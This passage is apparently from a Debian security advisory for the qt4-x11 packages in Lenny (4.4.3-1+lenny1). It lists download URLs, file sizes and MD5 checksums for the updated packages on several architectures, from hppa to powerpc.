http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 1634402 5314d4d81ac19f5645b1e1675ba6525e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 4753614 7c5f9e9415a58b065b593228bd8cac77 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 2311948 368daa9ae5595e3b01fc46c3d772d5e8 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 440934 dff816abb46a6fd0901aa7b46df70978 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 216320 06af895bbc34177ba07a54640fcd82f9 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 4111644 ba7285e1ab7763143616162c647f9c1c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 30560 7179e8bfc10ffba15f16fc489d6c8767 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 54867760 f3a6306eb7868e2051c9133ae13001a5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 2482204 99df86846bac3b9ed311d208e3d60052 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 1674078 b3a41e98392119d6f18714f2cd30c620 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 30556 4deae2df41ac92447aab4a19f28f449c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 67256 918f264f290aa032321eb41ffe3fb470 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 61638 d43df02948f52ae0ade58491e4e01184 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 215604 1368fdf3f01f9c6c8fe1f9ebf692aa7f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_hppa.deb Size/MD5 checksum: 150290 3e019e50412c7053e59210d23558ff3f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 60056 17379341e284a38f644c3ef48f3d153f http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 4308318 f66dac39c8646b5d6f86d687d14876a5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 86425734 45941d60457519d748df891ae9d6fb3b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 49540 53ef1e6bd36093d87e3a9ae9e4f8f25b http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 1525530 086e6751de436355a09962c886622f5b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 41558 610999d2f201d4aa2dbe2a8a7b89a297 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 30562 eb0de8312c4ae39517ce301513321433 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 134916 39a04c32712484b7afdeb8b18e9eaba9 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 1577902 c4e82a4d23e9d82fc3d03df912075dfd http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 132728 9f0b09e83111a6747b398ae769a58838 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 42696 c35fed94056e8b19ef711354aa2ec581 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 444694 f1a39c9137fb693c29296b8e253b13bc http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 780670 23067bad00a58f4072ca1af9a41af2ff http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 460070 a63dc401216e6c27d9047f1a755d2ca0 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 10386438 2591e51461f3b4a7247007cf45267135 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 3249592 ee8c1c0aa94c466ddeaafb4bd1f491db http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 61966 72d831daa19c34c59051845b4cd58a16 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 181350 9f48c0dbab6bb86cb5c59a9024493036 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 2083758 009fd94d4fac6f73eada4d20f91e88a2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 1389528 c80b6c53b187a323ecdfd3f4cfd5b44d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 53025666 29e651bcb5703a6bfe40a0800e36df1f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 30570 1e680aaa186d52d2a2242dd19b76ffa6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 185196 c8e779b2db03670eb05556887dfd0fc3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-ibase_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 72576 15f2f845993e5fe2dfe38cf4202e0070 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 236816 c6dfeb8fd01d4405377e4ccdda4131cb http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 4282456 35848f6936fe030424f44e71992631e5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 57054 ead8f282f8104e070642dcced8ec9bdb http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 135448 6c28e942bcdbeac060e8e8a0a84ddb90 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 45662 7902e7c821865035758a060acc06d1b8 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 13273488 dfd26b502ae2ec0b07ba5c8c3009f47b http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 403720 dfb3f85f19b28ae30d4fb8d7a70b3101 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 2103050 15bf7f0d013780dc6644c598cf9bfc2c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 70224 7292d01857e2e63c8d9c2a7559ce5e5c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_i386.deb Size/MD5 checksum: 240438 0677fbf3af429aed4042035cf5fe3174 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 1117582 626119564af23bf1502e7356f21b6915 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 44950 b77dd8bcdd872ce53477addc87e837fe http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 6027574 84ed0cba631580c23c512ef0528ce6a3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 30550 67930c8d0685ce81832a8ce84c0f7a24 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 68624 068eb1b54b047f52435a2020e206ae5e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 53396760 3d187d9ea8c05ec521440f2b30091fa6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 2575384 59b7a007a62ff3a30631333384f4ef15 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 487778 06aca6786068692ae811409418122138 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 295098 dbfaa938bdc60534692c34ffb94abe4c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 2668608 9e82b0b6dfcba94112666fe8ea9c8d9a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 66094 4cfea5eee8f72a9ac230fa6a460a6d5f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 41242 1777cf6df5b2dcfbba2d6408e64cc03d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 54168 5ce5f187a81716b59d8f21bb5b574946 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 233336 53f4577c6bfc5ac24e83a9351f52cb57 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 302362 cc74da836c1676844082c818ed1186a6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 172432 d240749108d8900be7a1845294bff484 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 89080984 bc9e19f29d3e5528bae6c65f32b716ed http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 579478 488c9c35a86921e6190c0e4955536b37 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 166064 d7731426876b36221566f86a0a0e2453 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 70086 16f96b3e2676c23e80c968753e82784a http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 11526082 37f059728643cfabb94d9733655bac61 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 146634 8327e828736c91db0177ba6ba042cabc http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 1806196 15600b5f7f3d78467e2781fe84910620 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 4894148 f2ace07dc909157d021948dac7fc3bf5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 13971058 8a29679d1abf4a4e2df783cf1a861a1e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 250056 54ad40eb2b043e44bc0cf72cb82f99e6 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 83468 49e601ace7fc68fda06d2ea501eb79a5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 49078 2e01f8e5b543ed924286fbb75fa2efd8 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 661268 6d6858547004e307d140d694f27431d4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 30558 f2ce47b00bc67df9b185cc270a87e47c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 1873218 0e559bc2e24169cd62289412e0453f00 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 5244556 804c0718a2caacf6d26fffdbf006adae http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_ia64.deb Size/MD5 checksum: 2208414 069ed40aae3c456f06c81c06da3460e9 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 13731026 2cf7a5b1603540351b28ea37a98a681b http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 61884 19402e470dd403395446a6e5c55626b3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 445328 4d20e4060988521dc63cbf37c30f100d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 232750 0754ed2ce13641874a5fcc696cca9fd7 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 45358 dd4b5a28a81306956a47c03554cc8d59 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 2076344 cc317e6f6ef542e9ef43691e0cdfe625 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 238704 fab119df8f0826eb2c25a090f711b45e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 30564 2c816aed7bf0e28f6b425de26929e419 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 4384714 7900cddfa51331384db080a6040c7f74 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 130570 60d8c58cbbf93fbf0ce8a8df5aa1fee5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 138014 9e039fbb1238db80bab9e04ecea71a80 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 41614 e05888e3d7f0138c24fb20a5a422b4ca http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 3291732 5a8544c976f02858283c26ba43bd109a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 1353820 3cd3c7a8b0a56f081f3bca85a27a76ef http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 1997940 54b5e8e103e38cd53a13bfbd27559328 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 1548658 a8a9cc3cc9115c75a45bc0cd694134b8 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 193882 2bf228574df6a2835552b4815afc696a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 186294 d88d65e6a85ce57bcf9e81fa4fd04b77 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 30556 05b460890a55a81ba0f192235a3c0192 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 4351110 afac1e4e3ac405e1bbe8283e37d20b45 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 49412 ca97fb0c6d14a2114885b2cb87786e15 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 41262 7f4bb9e46d585246ed69e7da595570bd http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 10432216 ef271383ff6f2600b966955f21d75dc1 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 1599606 3e088686e99b421f9f531ea7d5baa162 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 796818 a4a24e95261b29c8da07f3b5b61a14c2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 57742 1350b3cc65918433cf9974be12129405 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 69750 dc570d8cf67f8ae2f44df459f89a7704 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 60274 eabf99068a0d0182eb1d95bc231d9c82 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 431144 e23f8d941bf2f10c1a9ea53f01b19261 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 55251700 eedba6f66975bbb0433c6e650d33071f http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 425568 c4936529fc1fcb1d135cfc01892ab40d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 131324 0a867f9ea1ea1eb906d46f43c180fe05 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_mips.deb Size/MD5 checksum: 89596300 6d22a177a7c1ef7e457a75756990d604 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 229968 e7876664a0ea2577213f6dc854dc7beb http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-demos_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 10376684 ee440eeb5d00ea1a8e1172d3b3d00aff http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 4347292 f4cd4c89a0f7537f8e26f6879a0f893e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 191406 9f015ddc9e3e9c718cb97ab11296c6e5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 41540 7661ae54a10a2d2ca44875d123705870 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 30552 3d0751fdd9aed771e4912c211bea089e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 1958868 43fc237fccc7979cb4328769a9712b44 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-help_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 236330 f39a7a36d1d13e6cabc183b54bc8a541 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xml_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 135644 50bb1a918ca208dbb524211ca2f1fd72 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 4290348 10ad0e19a2388acc31a88f8ac25ad2e5 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 57452 e41274c827e5cf94498772b74579d58e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 30570 f48d279ccdd49c6e519da7df2f910b1e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 86262916 279b30139f7d4e7a24bc3fe3873d802e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 130074 20a9cb3f067bb663cf6b9e5500afc15d http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 3144304 18c39b4efe29da0f6698f7cc1662513c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 759628 8bd9c81c6160c6fa73955e6eb7589143 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 129280 0d196ba45f0f25957b28519063fec79a http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 59950 ce633cf5f8ca612bdea81d98eb984c39 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-odbc_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 69248 c26886682df753907b8c6e32167135e8 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qmake_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 1585390 09d818aafb7331444c5f799390a5ab61 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 49176 34549e52d8e29ed02c7d469145c47391 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 1532608 37e6e25a50b4f9823a5455c51966c8e3 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-script_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 425456 5883cd14a56c3bc2903f72704231a0bf http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-network_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 439666 5fbc5af909dc395f49f720542f8735d1 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 13194092 ea7674bd0c4b797d0295b17dd1ed3e85 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-sqlite2_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 45182 8ffbc7bb8d565ddc3fe773a2c099a523 http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 422618 b1edf41f7dc0214b2dac0c3395fac73c http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-webkit-dbg_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 52871332 be96377a4b5ebdaddef10c5001895cbe http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 2048016 8569e3fdef2371d07a123344e7ef8abb http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-psql_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 61554 bf0effb3185b92e7eb0de5729f1be76e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 41254 70f58c78b610e1937e52eb34e5809d2e http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 1327318 de6c4ecc2baf7e28b8705dca4f3606a7 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-svg_4.4.3-1+lenny1_mipsel.deb Size/MD5 checksum: 184066 ff313cbda6b9bcb6dd71dc7cca3c07ec powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-xmlpatterns-dbg_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 13997058 d47bbbd31efc9282a917cc48d921c1fb http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 140650 f0f469b814443d6113365d6ac8c01b4f http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl-dev_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 42212 81d51c4361750df38e6dd7bcb7f294e4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 4435166 cd8b0b45170ea1ccb5af66a2a037f9ac http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-opengl_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 196810 77aa5a519b4bbc82fac8ea9d7086ede4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-mysql_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 60652 8ce4b23af0fc90b90d9c4d53d1a50bda http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 30802 69317bc289e10bf016e6df959f364f63 http://security.debian.org/pool/updates/main/q/qt4-x11/libqtcore4_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 2182738 31201b8165db906fb338c217aaf7b835 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-assistant_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 44858 e2f7113b7b7c00a86caf179c2a8042b2 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbg_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 90556268 8acc67fe335daaf799bece65ea6ef2e4 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-designer_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 2149626 93b142c76b1c8e1fba0f2d5c5e1f52b0 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql-ibase_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 75792 97ae586b12501133f0f3c2139fd55620 http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-test_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 64864 33f39474f447957c77cb1eca2188fdff http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dbus_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 251222 2b12af171e0b6bc3e01a2d169f8e9ded http://security.debian.org/pool/updates/main/q/qt4-x11/libqtgui4_4.4.3-1+lenny1_powerpc.deb Size/MD5 checksum: 4545642 fb808821c12d59490d232c1573ce9425 